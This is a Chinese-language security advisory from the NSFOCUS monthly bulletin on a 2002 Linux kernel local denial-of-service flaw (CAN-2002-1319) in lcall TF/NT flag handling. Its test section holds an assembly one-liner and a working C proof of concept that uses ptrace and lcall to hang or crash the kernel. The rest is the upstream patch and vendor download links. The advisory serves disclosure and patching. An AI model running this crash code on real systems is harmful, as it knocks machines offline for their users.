首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第37期->最新漏洞
期刊号: 类型: 关键词:
Linux Kernel 系统调用TF/NT标记本地拒绝服务攻击漏洞

日期:2002-12-02

发布日期:2002-11-06
更新日期:2002-11-12

受影响系统:
Linux kernel 2.4.9
Linux kernel 2.4.8
Linux kernel 2.4.7
Linux kernel 2.4.6
Linux kernel 2.4.5
Linux kernel 2.4.4
Linux kernel 2.4.3
Linux kernel 2.4.2
Linux kernel 2.4.17
Linux kernel 2.4.16
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
Linux kernel 2.4.12
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.1
Linux kernel 2.2.21
Linux kernel 2.2.20
Linux kernel 2.2.19
Linux kernel 2.2.18
Linux kernel 2.2.17
Linux kernel 2.2.16
Linux kernel 2.2.15
Linux kernel 2.2.14
Linux kernel 2.2.13
Linux kernel 2.4.18
    - Debian Linux 3.0 i386
    - Debian Linux 3.0 sparc
    - Debian Linux 3.0 alpha
    - Debian Linux 3.0 IA-32
    - Debian Linux 3.0 arm
    - Debian Linux 3.0 powerpc
    - Debian Linux 3.0 68k
    - Mandrake Linux 8.2
    - Mandrake Linux 8.1
    - RedHat Linux 8.0
    - RedHat Linux 7.3
    - Slackware Linux 8.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 6115
CVE(CAN) ID: CAN-2002-1319

Linux Kernel是开放源代码的Linux内核系统。

Linux内核不正确处理系统调用的TF/NT标记,本地攻击者利用这个漏洞可以进行拒绝服务攻击。

Linux内核在处理lcall调用时会仿真一个陷阱/中断门. 真正的陷阱/中断门会在进入内核之前清除EFLAGS中的TF和NT标记, 然而Linux内核的仿真代码在实现上没有做这一步处理. 如果本地攻击者在调用lcall之前有意设置了TF或NT标志, 就会导致内核错误地根据EFLAGS进行处理, 这将造成内核崩溃, 系统可能挂起或重启.

这个漏洞影响x86平台下的Linux kernel 2.2.x, 2.4.20以及更低版本, 2.5.x.

<*来源:Georgi Guninski (guninski@guninski.com)
        Christophe Devine (devine@iie.cnam.fr)
  
  链接:http://www.guninski.com/php1.html
        http://marc.theaimsgroup.com/?l=bugtraq&m=103721681629765&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=103737292709297&w=2
        https://www.redhat.com/support/errata/RHSA-2002-264.html
        http://www.trustix.net/errata/misc/2002/TSL-2002-0077-kernel.asc.txt
        https://www.redhat.com/support/errata/RHSA-2002-262.html
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

下面的ASM可以导致kernel<2.4.19挂起:

#define MSUX "mov $0x100,%eax\npushl %eax\nmov $0x1,%eax\npopfl\nlcall $7,$0"

Christophe Devine(devine@iie.cnam.fr) 提供了如下测试程序:

#include <sys/ptrace.h>

struct user_regs_struct {
        long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        long orig_eax, eip;
        unsigned short cs, __cs;
        long eflags, esp;
        unsigned short ss, __ss;
};

int main( void )
{
    int pid;
    char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
    void (* lcall7)( void ) = (void *) dos;
    struct user_regs_struct d;

    if( ! ( pid = fork() ) )
    {
        usleep( 1000 );
        (* lcall7)();
    }
    else
    {
        ptrace( PTRACE_ATTACH, pid, 0, 0 );
        while( 1 )
        {
            wait( 0 );
            ptrace( PTRACE_GETREGS, pid, 0, &d );
            d.eflags |= 0x4100; /* set TF and NT */
            ptrace( PTRACE_SETREGS, pid, 0, &d );
            ptrace( PTRACE_SYSCALL, pid, 0, 0 );
        }
    }

    return 1;
}

建议:
--------------------------------------------------------------------------------
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 禁止不可信用户登录系统.

厂商补丁:

Linux
-----
Linus Torvalds 已经发布了升级补丁以修复这个安全问题:

# The following is the BitKeeper ChangeSet Log
# --------------------------------------------
# 02/11/14      torvalds@home.transmeta.com       1.848
# Fix impressive call gate misuse DoS reported on bugtraq.
# --------------------------------------------
# 02/11/14      torvalds@home.transmeta.com       1.849
# Duh. Fix the other lcall entry point too.
# --------------------------------------------
#
diff -Nru a/arch/i386/kernel/entry.S b/arch/i386/kernel/entry.S
--- a/arch/i386/kernel/entry.S  Thu Nov 14 09:59:08 2002
+++ b/arch/i386/kernel/entry.S  Thu Nov 14 09:59:08 2002
@@ -66,7 +66,9 @@
OLDSS          = 0x38

CF_MASK                = 0x00000001
+TF_MASK                = 0x00000100
IF_MASK                = 0x00000200
+DF_MASK                = 0x00000400
NT_MASK                = 0x00004000
VM_MASK                = 0x00020000

@@ -134,6 +136,17 @@
        movl %eax,EFLAGS(%esp)  #
        movl %edx,EIP(%esp)     # Now we move them to their "normal" places
        movl %ecx,CS(%esp)      #
+
+       #
+       # Call gates don't clear TF and NT in eflags like
+       # traps do, so we need to do it ourselves.
+       # %eax already contains eflags (but it may have
+       # DF set, clear that also)
+       #
+       andl $~(DF_MASK | TF_MASK | NT_MASK),%eax
+       pushl %eax
+       popfl
+
        movl %esp, %ebx
        pushl %ebx
        andl $-8192, %ebx       # GET_THREAD_INFO
@@ -156,6 +169,17 @@
        movl %eax,EFLAGS(%esp)  #
        movl %edx,EIP(%esp)     # Now we move them to their "normal" places
        movl %ecx,CS(%esp)      #
+
+       #
+       # Call gates don't clear TF and NT in eflags like
+       # traps do, so we need to do it ourselves.
+       # %eax already contains eflags (but it may have
+       # DF set, clear that also)
+       #
+       andl $~(DF_MASK | TF_MASK | NT_MASK),%eax
+       pushl %eax
+       popfl
+
        movl %esp, %ebx
        pushl %ebx
        andl $-8192, %ebx       # GET_THREAD_INFO

RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2002:264-05)以及相应补丁:
RHSA-2002:264-05:New kernel 2.2 packages fix local denial of service issue
链接:https://www.redhat.com/support/errata/RHSA-2002-264.html

补丁下载:

Red Hat Linux 6.2:

SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/kernel-2.2.22-6.2.3.src.rpm

i386:
ftp://updates.redhat.com/6.2/en/os/i386/kernel-smp-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-BOOT-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-ibcs-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-utils-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-pcmcia-cs-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-doc-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-headers-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-source-2.2.22-6.2.3.i386.rpm

i586:
ftp://updates.redhat.com/6.2/en/os/i586/kernel-smp-2.2.22-6.2.3.i586.rpm
ftp://updates.redhat.com/6.2/en/os/i586/kernel-2.2.22-6.2.3.i586.rpm

i686:
ftp://updates.redhat.com/6.2/en/os/i686/kernel-enterprise-2.2.22-6.2.3.i686.rpm
ftp://updates.redhat.com/6.2/en/os/i686/kernel-smp-2.2.22-6.2.3.i686.rpm
ftp://updates.redhat.com/6.2/en/os/i686/kernel-2.2.22-6.2.3.i686.rpm

Red Hat Linux 7.0:

SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/kernel-2.2.22-7.0.3.src.rpm

i386:
ftp://updates.redhat.com/7.0/en/os/i386/kernel-smp-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-BOOT-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-ibcs-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-utils-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-pcmcia-cs-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-doc-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-source-2.2.22-7.0.3.i386.rpm

i586:
ftp://updates.redhat.com/7.0/en/os/i586/kernel-smp-2.2.22-7.0.3.i586.rpm
ftp://updates.redhat.com/7.0/en/os/i586/kernel-2.2.22-7.0.3.i586.rpm

i686:
ftp://updates.redhat.com/7.0/en/os/i686/kernel-enterprise-2.2.22-7.0.3.i686.rpm
ftp://updates.redhat.com/7.0/en/os/i686/kernel-smp-2.2.22-7.0.3.i686.rpm
ftp://updates.redhat.com/7.0/en/os/i686/kernel-2.2.22-7.0.3.i686.rpm

RedHat已经为此发布了一个安全公告(RHSA-2002:262-07)以及相应补丁:
RHSA-2002:262-07:New kernel fixes local denial of service issue
链接:https://www.redhat.com/support/errata/RHSA-2002-262.html

补丁下载:
Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/kernel-2.4.18-18.7.x.src.rpm

athlon:
ftp://updates.redhat.com/7.1/en/os/athlon/kernel-2.4.18-18.7.x.athlon.rpm
ftp://updates.redhat.com/7.1/en/os/athlon/kernel-smp-2.4.18-18.7.x.athlon.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/kernel-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/kernel-source-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/kernel-doc-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/kernel-BOOT-2.4.18-18.7.x.i386.rpm

i586:
ftp://updates.redhat.com/7.1/en/os/i586/kernel-2.4.18-18.7.x.i586.rpm
ftp://updates.redhat.com/7.1/en/os/i586/kernel-smp-2.4.18-18.7.x.i586.rpm

i686:
ftp://updates.redhat.com/7.1/en/os/i686/kernel-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.1/en/os/i686/kernel-smp-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.1/en/os/i686/kernel-bigmem-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.1/en/os/i686/kernel-debug-2.4.18-18.7.x.i686.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/kernel-2.4.18-18.7.x.src.rpm

athlon:
ftp://updates.redhat.com/7.2/en/os/athlon/kernel-2.4.18-18.7.x.athlon.rpm
ftp://updates.redhat.com/7.2/en/os/athlon/kernel-smp-2.4.18-18.7.x.athlon.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/kernel-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-source-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-doc-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-BOOT-2.4.18-18.7.x.i386.rpm

i586:
ftp://updates.redhat.com/7.2/en/os/i586/kernel-2.4.18-18.7.x.i586.rpm
ftp://updates.redhat.com/7.2/en/os/i586/kernel-smp-2.4.18-18.7.x.i586.rpm

i686:
ftp://updates.redhat.com/7.2/en/os/i686/kernel-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.2/en/os/i686/kernel-smp-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.2/en/os/i686/kernel-bigmem-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.2/en/os/i686/kernel-debug-2.4.18-18.7.x.i686.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/kernel-2.4.18-18.7.x.src.rpm

athlon:
ftp://updates.redhat.com/7.3/en/os/athlon/kernel-2.4.18-18.7.x.athlon.rpm
ftp://updates.redhat.com/7.3/en/os/athlon/kernel-smp-2.4.18-18.7.x.athlon.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/kernel-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/kernel-source-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/kernel-doc-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/kernel-BOOT-2.4.18-18.7.x.i386.rpm

i586:
ftp://updates.redhat.com/7.3/en/os/i586/kernel-2.4.18-18.7.x.i586.rpm
ftp://updates.redhat.com/7.3/en/os/i586/kernel-smp-2.4.18-18.7.x.i586.rpm

i686:
ftp://updates.redhat.com/7.3/en/os/i686/kernel-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.3/en/os/i686/kernel-smp-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.3/en/os/i686/kernel-bigmem-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.3/en/os/i686/kernel-debug-2.4.18-18.7.x.i686.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/kernel-2.4.18-18.8.0.src.rpm

athlon:
ftp://updates.redhat.com/8.0/en/os/athlon/kernel-2.4.18-18.8.0.athlon.rpm
ftp://updates.redhat.com/8.0/en/os/athlon/kernel-smp-2.4.18-18.8.0.athlon.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/kernel-2.4.18-18.8.0.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/kernel-source-2.4.18-18.8.0.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/kernel-doc-2.4.18-18.8.0.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/kernel-BOOT-2.4.18-18.8.0.i386.rpm

i586:
ftp://updates.redhat.com/8.0/en/os/i586/kernel-2.4.18-18.8.0.i586.rpm
ftp://updates.redhat.com/8.0/en/os/i586/kernel-smp-2.4.18-18.8.0.i586.rpm

i686:
ftp://updates.redhat.com/8.0/en/os/i686/kernel-2.4.18-18.8.0.i686.rpm
ftp://updates.redhat.com/8.0/en/os/i686/kernel-smp-2.4.18-18.8.0.i686.rpm
ftp://updates.redhat.com/8.0/en/os/i686/kernel-bigmem-2.4.18-18.8.0.i686.rpm
ftp://updates.redhat.com/8.0/en/os/i686/kernel-debug-2.4.18-18.8.0.i686.rpm
ftp://updates.redhat.com/8.0/en/os/i686/kernel-uml-2.4.18-18.8.0.i686.rpm
可使用下列命令安装补丁:

rpm -Fvh [文件名]

Trustix
-------
Trustix已经为此发布了一个安全公告(TSLSA-2002-0077)以及相应补丁:
TSLSA-2002-0077:kernel
链接:http://www.trustix.net/errata/misc/2002/TSL-2002-0077-kernel.asc.txt

补丁下载:

http://www.trustix.net/pub/Trustix/updates/
版权所有,未经许可,不得转载